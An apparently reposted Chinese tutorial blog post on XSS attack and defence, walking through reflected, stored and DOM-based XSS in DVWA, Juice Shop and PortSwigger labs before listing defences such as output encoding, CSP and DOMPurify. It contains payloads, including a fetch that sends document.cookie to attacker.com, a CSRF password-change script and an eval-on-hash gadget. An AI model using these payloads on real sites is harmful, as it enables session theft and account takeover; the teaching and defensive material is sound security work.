XSS攻防实战笔记:从反射、存储到DOM型的漏洞原理与靶场复现

news2026/3/23 20:44:59
1. XSS漏洞初探当输入框变成攻击入口第一次接触XSS漏洞时我盯着那个普通的搜索框看了很久——谁能想到这个每天都要打交道的网页元素竟然能成为黑客的攻击入口记得当时我在一个测试网站上随手输入scriptalert(嘿你被XSS了)/script按下回车键的瞬间那个弹出的警告框让我后背一凉。这就是跨站脚本攻击Cross-Site Scripting最直观的体现攻击者通过注入恶意脚本让受害者的浏览器执行不该执行的代码。XSS之所以危险是因为它利用了网站对用户输入的过度信任。现代网站需要与用户频繁交互搜索框、评论区、个人资料编辑这些地方都需要接收用户输入并展示出来。如果开发者没有做好防护攻击者就能在这些输入-输出的环节中插入恶意代码。最常见的三类XSS是反射型、存储型和DOM型它们的攻击路径和危害程度各不相同。举个例子去年某知名论坛的存储型XSS漏洞导致上万用户信息泄露。攻击者在个人简介字段插入恶意脚本每当其他用户查看他的资料时脚本就会悄悄把用户的cookie发送到攻击者服务器。这个案例让我意识到XSS绝不只是弹个警告框那么简单它可能成为大规模数据泄露的入口。2. 反射型XSS钓鱼链接里的陷阱2.1 原理剖析一闪而过的恶意反射型XSS就像网络世界的一次性武器攻击者需要精心构造一个恶意链接诱骗受害者点击。当受害者打开链接时服务器会将恶意脚本反射回浏览器执行。我在本地靶场测试时构造了这样一个URLhttp://vulnerable-site.com/search?qscriptalert(document.cookie)/script当管理员查看搜索日志时他的会话cookie就会通过alert弹窗显示出来。虽然这个例子很简单但实际攻击中攻击者会用更隐蔽的方式窃取数据。反射型XSS有两个关键特点首先恶意脚本不会存储在服务器上而是通过URL参数传递其次需要用户交互点击链接才能触发。这使它成为网络钓鱼的完美搭档。我曾见过攻击者将恶意链接伪装成工资单查询、会议通知等正常邮件诱导企业员工点击。2.2 靶场实战从发现到利用在DVWADamn Vulnerable Web Application靶场中复现反射型XSS特别有教育意义。设置安全级别为low后我在搜索框输入测试payloadimg srcx onerroralert(XSS)页面立即弹窗说明存在漏洞。进阶测试时我会用Burp Suite拦截请求修改参数值插入更复杂的脚本。比如script fetch(http://attacker.com/steal?cookiedocument.cookie) /script这个脚本会悄悄把用户cookie发送到攻击者控制的服务器。防御这类攻击关键在于对所有URL参数进行严格的输出编码。3. 存储型XSS潜伏在数据库里的定时炸弹3.1 持久化攻击的危害如果说反射型XSS是一次性武器那存储型XSS就是埋在网站里的地雷。我在测试某开源论坛系统时发现它的评论区没有过滤HTML标签。于是发布了一条看似普通的评论iframe srcjavascript:alert(XSS)此后每个访问该页面的用户都会触发这个恶意脚本。更可怕的是即使用户注销再登录攻击依然有效因为恶意代码已经永久存储在服务器数据库里。存储型XSS常见于以下场景用户评论/留言系统商品评价区域论坛帖子内容客服聊天记录用户昵称或个人简介去年某电商平台就因商品评价区的存储型XSS漏洞导致攻击者能窃取所有查看商品详情页用户的支付信息。这个案例让我在开发中格外注意所有用户生成内容(UGC)的过滤。3.2 靶场复现从注入到防御在OWASP Juice Shop靶场中我通过以下步骤复现存储型XSS找到商品评价功能点提交包含恶意脚本的评价svg onloadalert(XSS)刷新页面后发现脚本持续执行防御存储型XSS需要多层防护输入过滤移除或转义特殊字符输出编码根据输出上下文(HTML/JS/URL)使用不同编码内容安全策略(CSP)限制脚本执行来源HttpOnly标记防止通过JavaScript访问cookie4. DOM型XSS客户端渲染的暗礁4.1 不经过服务器的攻击DOM型XSS是最容易被忽视的类型因为它完全在客户端发生不经过服务器处理。我在审计某SPA(Single Page Application)网站时发现一个典型案例。网站通过以下方式获取并显示URL中的用户名let username window.location.hash.substr(1); document.getElementById(welcome).innerHTML 欢迎, username;攻击者只需构造这样的URLhttp://victim-site.com#img srcx onerroralert(1)当用户访问时恶意代码就会被执行。这种攻击特别危险因为传统WAF无法检测到恶意payload根本不会发送到服务器。4.2 靶场演练解剖DOM操作在PortSwigger的DOM-XSS靶场中我通过开发者工具逐步调试JavaScript执行流程发现页面使用以下代码处理URL参数let search document.location.search; let params new URLSearchParams(search); let keyword params.get(search); document.write(搜索结果 keyword);构造恶意URLhttp://target.com?searchscriptalert(1)/script观察document.write如何将未转义的内容写入DOM防御DOM型XSS需要避免使用危险的DOM操作方法如innerHTML、document.write对动态内容使用textContent而非innerHTML使用DOMPurify等库净化HTML内容实施严格的CSP策略5. 组合拳攻击XSS的高级利用5.1 突破同源策略单纯的XSS弹窗演示虽然直观但实际攻击往往更复杂。我曾在渗透测试中结合XSS和CSRF漏洞实现了对目标系统的完全控制。攻击流程如下通过存储型XSS注入恶意脚本脚本在受害者浏览器中执行构造CSRF请求利用受害者权限修改账户设置最终获取系统管理员权限这个案例中使用的关键payload如下fetch(/admin/change-password, { method: POST, body: newpassattacker123 });5.2 实际案例分析某次真实渗透测试中我发现目标网站存在DOM型XSS漏洞但常规payload被过滤。通过分析前端代码发现网站使用jQuery的$()方法插入动态内容。于是构造了这样的攻击$(window).on(hashchange, function(){ eval(location.hash.slice(1)); });然后通过URL传递恶意代码http://victim.com#alert(document.cookie)这个案例教会我理解前端框架的工作原理对发现高级XSS漏洞至关重要。6. 防御之道从开发到运维的全方位防护6.1 开发阶段的最佳实践经过多次XSS攻防实战我总结出以下防御方案输入验证// 白名单过滤示例 function sanitize(input) { return input.replace(/[^a-zA-Z0-9-_]/g, ); }上下文感知的输出编码// HTML实体编码 function encodeHTML(str) { return str.replace(//g,amp;) .replace(//g,lt;) .replace(//g,gt;); }安全框架使用前端DOMPurify、sanitize-html后端OWASP ESAPI、Spring Security6.2 运维层面的加固措施除了开发时的防护运维配置也至关重要内容安全策略(CSP)配置示例Content-Security-Policy: default-src self; script-src self https://trusted.cdn.com; img-src *; style-src self unsafe-inline;其他HTTP安全头X-XSS-Protection: 1; modeblock X-Content-Type-Options: nosniff在多次渗透测试中我发现即使应用层防护存在缺陷严格的CSP策略也能有效阻止大多数XSS攻击的成功执行。这提醒我们防御需要多层次、纵深化的策略。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2441577.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…